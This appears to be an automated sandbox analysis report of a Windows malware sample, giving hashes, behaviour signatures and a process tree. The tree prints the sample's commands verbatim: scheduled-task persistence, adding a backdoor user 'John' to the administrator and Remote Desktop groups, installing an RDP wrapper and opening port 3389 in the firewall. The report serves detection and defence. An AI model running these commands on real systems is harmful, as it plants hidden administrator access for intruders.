Analysis
-
max time kernel
42s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
31-12-2023 02:14
Static task
static1
Behavioral task
behavioral1
Sample
4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
Resource
win10v2004-20231215-en
General
-
Target
4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
-
Size
6.2MB
-
MD5
c92c59fa1503d65d1d67a578928e3c55
-
SHA1
0cb1106bde45dd5be118bb7b9ebb2be3e41b7203
-
SHA256
4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50
-
SHA512
1f8c714bfc23bd642ec6f4e5539ac1585e0cd8a54ba2b72ff06d7b4f0dd94589a8e6ab41b689f11f51425067784e071eeffc7e803470d55793492d38f6d11241
-
SSDEEP
196608:CIgAn6JaxBEvXUJyXEJDNfZJoExr77dZWoNMUyr:SA6YxBYXY+sJokFZWdUy
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
winserv.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Control Panel\International\Geo\Nation winserv.exe -
Executes dropped EXE 2 IoCs
Processes:
winserv.exewinserv.exepid Process 1812 winserv.exe 1716 winserv.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 2792 schtasks.exe 2696 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 460 timeout.exe -
NTFS ADS 2 IoCs
Processes:
4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exedescription ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\ 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exewinserv.exepid Process 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 1812 winserv.exe 1812 winserv.exe 1812 winserv.exe 1812 winserv.exe 1812 winserv.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
winserv.exedescription pid Process Token: SeDebugPrivilege 1812 winserv.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
winserv.exepid Process 1812 winserv.exe 1812 winserv.exe 1812 winserv.exe 1812 winserv.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exedescription pid Process procid_target PID 1896 wrote to memory of 2792 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 29 PID 1896 wrote to memory of 2792 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 29 PID 1896 wrote to memory of 2792 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 29 PID 1896 wrote to memory of 2696 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 31 PID 1896 wrote to memory of 2696 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 31 PID 1896 wrote to memory of 2696 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 31 PID 1896 wrote to memory of 1812 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 37 PID 1896 wrote to memory of 1812 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 37 PID 1896 wrote to memory of 1812 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 37 PID 1896 wrote to memory of 1812 1896 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe 37 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe"C:\Users\Admin\AppData\Local\Temp\4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe"1⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:2792
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:2696
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1812 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second3⤵
- Executes dropped EXE
PID:1716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add2⤵PID:812
-
C:\Windows\system32\net.exenet user John 12345 /add3⤵PID:2260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add2⤵PID:1152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add2⤵PID:2252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add2⤵PID:2400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add2⤵PID:1460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add2⤵PID:1528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add2⤵PID:1840
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i2⤵PID:2396
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵
- Modifies Windows Firewall
PID:2580
-
-
-
C:\Windows\system32\cmd.execmd /c C:\Programdata\Install\del.bat2⤵PID:2884
-
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
PID:460
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add1⤵PID:2216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add1⤵PID:2952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add1⤵PID:620
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add1⤵PID:2080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add2⤵PID:1156
-
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add1⤵PID:1400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add2⤵PID:1676
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add1⤵PID:1628
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add1⤵PID:1656
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add1⤵PID:1932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add1⤵PID:2088
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add1⤵PID:2240
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add1⤵PID:2432
-
C:\Windows\system32\taskeng.exetaskeng.exe {DBB63B1A-B928-4768-B891-E48C47900C3C} S-1-5-21-1603059206-2004189698-4139800220-1000:AILVMYUM\Admin:Interactive:[1]1⤵PID:1500
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe2⤵PID:2120
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe2⤵PID:2860
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
315B
MD5155557517f00f2afc5400ba9dc25308e
SHA177a53a8ae146cf1ade1c9d55bbd862cbeb6db940
SHA256f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e
SHA51240baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32
-
Filesize
73KB
MD51a275176696b0583df12aaa55d928648
SHA14f305512742b737e755858bb087f18e749b48a8a
SHA2569e8d22bda62f2475da0e00bb79175afa901bd293be8f0e8ec74eda0437073b77
SHA5127b9ec8ee90505550a22bdb5e0a9285057198aa585cf76ad21d80ccaca97f841f4e20e15979a6741a3cef808c75683b5126d45136f15514d2cab229522c3e3996
-
Filesize
158KB
MD5f0e1c50f194dce3f0c7c3305e9969cff
SHA13a01670aee72a74b06593124c53914fafed0fb2e
SHA256a9b3476bc34b63680ccbf8b7bdac8dba16a47aae2e4f6afdc97235ef92ec21c7
SHA51239735274cf0220c8d3be46ac88d87342d79a7cf247fe35dfaacb005819be0d80d31f1bbd07863e626015c92d16c1418f8542e4245097b3d39025f694171187f2
-
Filesize
2KB
MD5e21b95f6f2e5a0483e40b4caef16c718
SHA14310628908a9ff2c30064700f90a502cb3e13e49
SHA2565deccd3b77e7f261ca0d427f0aa7dbdabb1d8c4ba92672a15855949813a16a58
SHA512fd5b05a1f42ab36b39b4bfd08a244362b456bd5ecaee14912538d9a2d9c26583b0b824c4d606ae5e869cc143ea67d48269204dd5897878f35360439fd61246f2
-
Filesize
367KB
MD5930a4e2a78e8ce6b68d64cb2e865e19f
SHA14d6daff0a9f5025213e0f0ed9557907ee5fedbba
SHA2564ab84c49e35261e69aa92691d2073549787fbb19ed3e4c53dbb5f6da7139e920
SHA512af49e20bd2f5c310e218771b73bf946d68dccaefe819ee3dde5a96e88b472fd6ccda267ba7ccbdc47cc15497992246b1befbef0505c8cb914af42a6c71869362
-
Filesize
1.1MB
MD5f6962cfd1052abe47ccdb883c289b820
SHA1983f8e16019cbc8d4129d55cf9d44d942c518ff6
SHA256bee782a06e9d961660b57c214c98a9fcc3055d139f8ff0427b2fc1d8a14ace2c
SHA512e12cd6dc65d60db1457abe83102b27b2ddbc2db25fa9b059deb7520827e777811056b2796f5cef7e84df22efd90905887b12dd3704a81a74ab60c84820eb5c7e
-
Filesize
127KB
MD5d41c38cbce0fb146496dbc4a61527a3b
SHA10339852c3a9606a3a0739f9608c1a2d7b86fd640
SHA2567036723eb231c4e03ff2560fe0a298cd8746facfa7530607f697cf32f1931a18
SHA512e24739f5b4c8af4860a1210ef3cad33e02e6b8218d43a19dd688db6183dad48dfddc4a162579d9277e043afe03d9e7fec21feeaaaa614791ddbc4d2c61b4ff2e
-
Filesize
269KB
MD591552b735708cdf6c057ecbb8a7b84cb
SHA1b3ab0145809e83043095e069cd5a38558280b5b0
SHA25662246a55bce052a125d6c4613d83bd9a9be4f9e542558e492c8bbe059e15614c
SHA5124fb1263cad74efaada0c790a44d1d5e8018abc9414a31bf69fab803d1ed4eb561cf360d451bd4a4e23deb47622ca8dc999f239c735ad063f38f69fb1abe902bd
-
Filesize
84KB
MD584e6bf451e9427b7ea198442a0771756
SHA15c7ec50d2f5a90bf641cf4c94164e0ae421af553
SHA256bdb89ce84e1f1dc777069daabb2653de28f6fd8780ad8b2ae890c7f1789cd044
SHA512d1d2c9ecae19050dc173759c350d777cb13a75508c7a3aea146a295c9ab9aa1425af5ad2a64e038c614bdb398e97a392481b7de82ec953529b0deb4c7fbb2fb1
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26